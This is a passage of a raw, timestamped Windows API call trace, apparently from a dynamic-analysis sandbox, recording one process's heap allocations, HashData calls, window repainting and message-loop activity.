(HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0180.680] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f50 [0180.680] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7bd8 [0180.680] HashData (in: pbData=0x9f82f54, cbData=0x4, pbHash=0x9f82f58, cbHash=0x2 | out: pbHash=0x9f82f58) returned 0x0 [0180.680] HashData (in: pbData=0x6d7bd8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.680] HashData (in: pbData=0x6d7bda, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.680] HashData (in: pbData=0x6d7bdc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.680] HashData (in: pbData=0x6d7be4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.680] HashData (in: pbData=0x6d7bec, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.680] HashData (in: pbData=0x6d7bf4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.680] HashData (in: pbData=0x6d7bf6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.680] HashData (in: pbData=0x6d7bf8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.680] HashData (in: pbData=0x6d7c00, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.680] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0180.680] HashData (in: pbData=0x6d7c0c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.680] HashData (in: pbData=0x6d7c14, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.680] HashData (in: pbData=0x6d7c20, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.680] HashData (in: pbData=0x6d7c24, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.680] HashData (in: pbData=0x6d7c2c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.680] HashData (in: pbData=0x6d7c38, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.681] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7bd8 | out: hHeap=0x5e0000) returned 1 [0180.681] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f50 | out: hHeap=0x5e0000) returned 1 [0180.681] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0180.681] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0180.681] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0180.681] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0180.681] GetFocus () returned 0x103e2 [0180.682] GetFocus () returned 0x103e2 [0180.682] GetSysColor (nIndex=15) returned 0xf0f0f0 [0180.683] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d77e8 | out: hHeap=0x5e0000) returned 1 [0180.683] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0180.683] _CIsqrt () returned 0x407b027f [0180.683] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d00 [0180.683] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.683] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.683] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d00 | out: hHeap=0x5e0000) returned 1 [0180.684] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6ddc58 [0180.684] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.684] HashData (in: pbData=0xd953e0, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0180.687] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddc58 | out: hHeap=0x5e0000) returned 1 [0180.687] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0180.687] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83028 [0180.687] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d78c8 [0180.688] HashData (in: pbData=0x9f8302c, cbData=0x4, pbHash=0x9f83030, cbHash=0x2 | out: pbHash=0x9f83030) returned 0x0 [0180.688] HashData (in: pbData=0x6d78c8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.688] HashData (in: pbData=0x6d78ca, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.688] HashData (in: pbData=0x6d78cc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.688] HashData (in: pbData=0x6d78d4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.688] HashData (in: pbData=0x6d78dc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.688] HashData (in: pbData=0x6d78e4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.688] HashData (in: pbData=0x6d78e6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.688] HashData (in: pbData=0x6d78e8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.688] HashData (in: pbData=0x6d78f0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.688] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0180.688] HashData (in: pbData=0x6d78fc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.688] HashData (in: pbData=0x6d7904, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.688] HashData (in: pbData=0x6d7910, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.688] HashData (in: pbData=0x6d7914, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.688] HashData (in: pbData=0x6d791c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.688] HashData (in: pbData=0x6d7928, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.688] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d78c8 | out: hHeap=0x5e0000) returned 1 [0180.688] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83028 | out: hHeap=0x5e0000) returned 1 [0180.688] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0180.688] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0180.688] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0180.688] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0180.688] GetFocus () returned 0x103e2 [0180.688] GetFocus () returned 0x103e2 [0180.689] GetFocus () returned 0x103e2 [0180.689] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0180.689] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0180.689] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0180.689] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0180.689] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0180.689] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0180.690] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82ff8 [0180.690] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.690] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0180.690] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0180.690] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0180.690] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0180.690] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0180.690] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0180.691] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83178 [0180.693] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.695] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83010 [0180.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82ff8 | out: hHeap=0x5e0000) returned 1 [0180.696] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83178 | out: hHeap=0x5e0000) returned 1 [0180.697] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83010 | out: hHeap=0x5e0000) returned 1 [0180.697] LsSetDoc () returned 0x0 [0180.697] LsCreateLine () returned 0x0 [0180.698] LsDisplayLine () returned 0x0 [0180.702] LsDestroyLine () returned 0x0 [0180.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d60 [0180.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830e8 [0180.702] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7af8 [0180.702] HashData (in: pbData=0x9f830ec, cbData=0x4, pbHash=0x9f830f0, cbHash=0x2 | out: pbHash=0x9f830f0) returned 0x0 [0180.702] HashData (in: pbData=0x6d7af8, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.702] HashData (in: pbData=0x6d7afa, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.702] HashData (in: pbData=0x6d7afc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.702] HashData (in: pbData=0x6d7b04, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.703] HashData (in: pbData=0x6d7b0c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.703] HashData (in: pbData=0x6d7b14, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.703] HashData (in: pbData=0x6d7b16, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.703] HashData (in: pbData=0x6d7b18, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.703] HashData (in: pbData=0x6d7b20, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.703] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0180.703] HashData (in: pbData=0x6d7b2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.703] HashData (in: pbData=0x6d7b34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.703] HashData (in: pbData=0x6d7b40, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.703] HashData (in: pbData=0x6d7b44, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.703] HashData (in: pbData=0x6d7b4c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.703] HashData (in: pbData=0x6d7b58, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.703] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7af8 | out: hHeap=0x5e0000) returned 1 [0180.703] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830e8 | out: hHeap=0x5e0000) returned 1 [0180.703] HashData (in: pbData=0x9ee6d60, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0180.703] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0180.703] HashData (in: pbData=0x9ee6d64, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0180.703] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d60 | out: hHeap=0x5e0000) returned 1 [0180.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6d00 [0180.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83130 [0180.703] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7d28 [0180.704] HashData (in: pbData=0x9f83134, cbData=0x4, pbHash=0x9f83138, cbHash=0x2 | out: pbHash=0x9f83138) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d28, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d2a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d2c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d34, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d3c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d44, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d46, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d48, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d50, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.704] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d5c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d64, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d70, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d74, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d7c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.704] HashData (in: pbData=0x6d7d88, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.704] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7d28 | out: hHeap=0x5e0000) returned 1 [0180.704] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83130 | out: hHeap=0x5e0000) returned 1 [0180.704] HashData (in: pbData=0x9ee6d00, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0180.704] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0180.704] HashData (in: pbData=0x9ee6d04, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0180.704] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6d00 | out: hHeap=0x5e0000) returned 1 [0180.705] GetSysColor (nIndex=15) returned 0xf0f0f0 [0180.706] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0180.706] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7bd8 [0180.706] _CIsqrt () returned 0x407b027f [0180.706] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0180.706] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.706] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.706] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0180.706] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x54) returned 0x6dd9b8 [0180.706] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.707] HashData (in: pbData=0xd95440, cbData=0x28, pbHash=0x19732c, cbHash=0x4 | out: pbHash=0x19732c) returned 0x0 [0180.707] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6dd9b8 | out: hHeap=0x5e0000) returned 1 [0180.707] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x9ee6ce0 [0180.707] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83100 [0180.707] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x64) returned 0x6d7a88 [0180.708] HashData (in: pbData=0x9f83104, cbData=0x4, pbHash=0x9f83108, cbHash=0x2 | out: pbHash=0x9f83108) returned 0x0 [0180.708] HashData (in: pbData=0x6d7a88, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.708] HashData (in: pbData=0x6d7a8a, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.708] HashData (in: pbData=0x6d7a8c, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.708] HashData (in: pbData=0x6d7a94, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.708] HashData (in: pbData=0x6d7a9c, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.708] HashData (in: pbData=0x6d7aa4, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.708] HashData (in: pbData=0x6d7aa6, cbData=0x2, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.708] HashData (in: pbData=0x6d7aa8, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.708] HashData (in: pbData=0x6d7ab0, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.708] HashData (in: pbData=0x197b14, cbData=0x4, pbHash=0x197b00, cbHash=0x2 | out: pbHash=0x197b00) returned 0x0 [0180.708] HashData (in: pbData=0x6d7abc, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.708] HashData (in: pbData=0x6d7ac4, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.708] HashData (in: pbData=0x6d7ad0, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.708] HashData (in: pbData=0x6d7ad4, cbData=0x8, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.708] HashData (in: pbData=0x6d7adc, cbData=0x8, pbHash=0x197ae8, cbHash=0x2 | out: pbHash=0x197ae8) returned 0x0 [0180.708] HashData (in: pbData=0x6d7ae8, cbData=0x4, pbHash=0x197afc, cbHash=0x2 | out: pbHash=0x197afc) returned 0x0 [0180.708] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d7a88 | out: hHeap=0x5e0000) returned 1 [0180.708] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83100 | out: hHeap=0x5e0000) returned 1 [0180.709] HashData (in: pbData=0x9ee6ce0, cbData=0x1, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0180.709] HashData (in: pbData=0x197b1c, cbData=0x4, pbHash=0x197b04, cbHash=0x2 | out: pbHash=0x197b04) returned 0x0 [0180.709] HashData (in: pbData=0x9ee6ce4, cbData=0x4, pbHash=0x197b20, cbHash=0x2 | out: pbHash=0x197b20) returned 0x0 [0180.709] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9ee6ce0 | out: hHeap=0x5e0000) returned 1 [0180.709] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0180.709] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0180.709] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0180.709] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0180.709] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0180.709] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0180.710] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f83100 [0180.710] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.710] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0180.710] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0180.710] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0180.710] MulDiv (nNumber=1, nNumerator=0, nDenominator=1) returned 0 [0180.710] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0180.710] MulDiv (nNumber=1, nNumerator=1, nDenominator=1) returned 1 [0180.711] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f830d0 [0180.711] GetSysColor (nIndex=15) returned 0xf0f0f0 [0180.712] GetSysColor (nIndex=15) returned 0xf0f0f0 [0180.712] GetSysColor (nIndex=15) returned 0xf0f0f0 [0180.713] GetSysColor (nIndex=15) returned 0xf0f0f0 [0180.713] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0180.713] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x9f82f20 [0180.714] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f83100 | out: hHeap=0x5e0000) returned 1 [0180.714] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f830d0 | out: hHeap=0x5e0000) returned 1 [0180.714] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x9f82f20 | out: hHeap=0x5e0000) returned 1 [0180.714] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68caf8 | out: hHeap=0x5e0000) returned 1 [0180.742] GetClientRect (in: hWnd=0x103e2, lpRect=0x199be4 | out: lpRect=0x199be4) returned 1 [0180.742] BitBlt (hdc=0x51010a85, x=171, y=213, cx=42, cy=23, hdcSrc=0x8e01071c, x1=171, y1=213, rop=0xcc0020) returned 1 [0180.742] ReleaseDC (hWnd=0x103e2, hDC=0x51010a85) returned 1 [0180.743] ReleaseDC (hWnd=0x103e2, hDC=0x4010197) returned 1 [0180.743] QueryPerformanceCounter (in: lpPerformanceCount=0x199d00 | out: lpPerformanceCount=0x199d00*=3099956217607) returned 1 [0180.744] DeleteObject (ho=0x2a040a81) returned 1 [0180.745] GetCurrentThreadId () returned 0xb48 [0180.745] InitOnceExecuteOnce (in: InitOnce=0x6e89927c, InitFn=0x6dd8e660, Parameter=0x0, Context=0x0 | out: InitOnce=0x6e89927c, Parameter=0x0, Context=0x0) returned 1 [0180.745] QueryPerformanceCounter (in: lpPerformanceCount=0x19a218 | out: lpPerformanceCount=0x19a218*=3099956365879) returned 1 [0180.745] QueryPerformanceCounter (in: lpPerformanceCount=0x19a228 | out: lpPerformanceCount=0x19a228*=3099956373663) returned 1 [0180.745] KillTimer (hWnd=0x30316, uIDEvent=0x2027) returned 1 [0180.745] GetMessageW (in: lpMsg=0x19a5a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19a5a8) returned 1 [0180.746] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0180.746] NtdllDefWindowProc_W () returned 0x0 [0181.098] TranslateMessage (lpMsg=0x19a5a8) returned 0 [0181.098] DispatchMessageW (lpMsg=0x19a5a8) returned 0x0 [0181.098] GetWindowLongW (hWnd=0x103e4, nIndex=-21) returned 7140024 [0181.103] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.104] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.104] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.104] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.104] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.104] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.104] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.104] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.104] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.104] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 1 [0181.105] PeekMessageW (in: lpMsg=0x19a3fc, hWnd=0x103e4, wMsgFilterMin=0x401, wMsgFilterMax=0x401, wRemoveMsg=0x3 | out: lpMsg=0x19a3fc) returned 0 [0181.105] NtdllDefWindowProc_W () returned 0x0 [0181.105] NtdllDefWindowProc_W () returned 0x0 [0181.108] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0181.108] IsIconic (hWnd=0x103e0) returned 0 [0181.108] GetClientRect 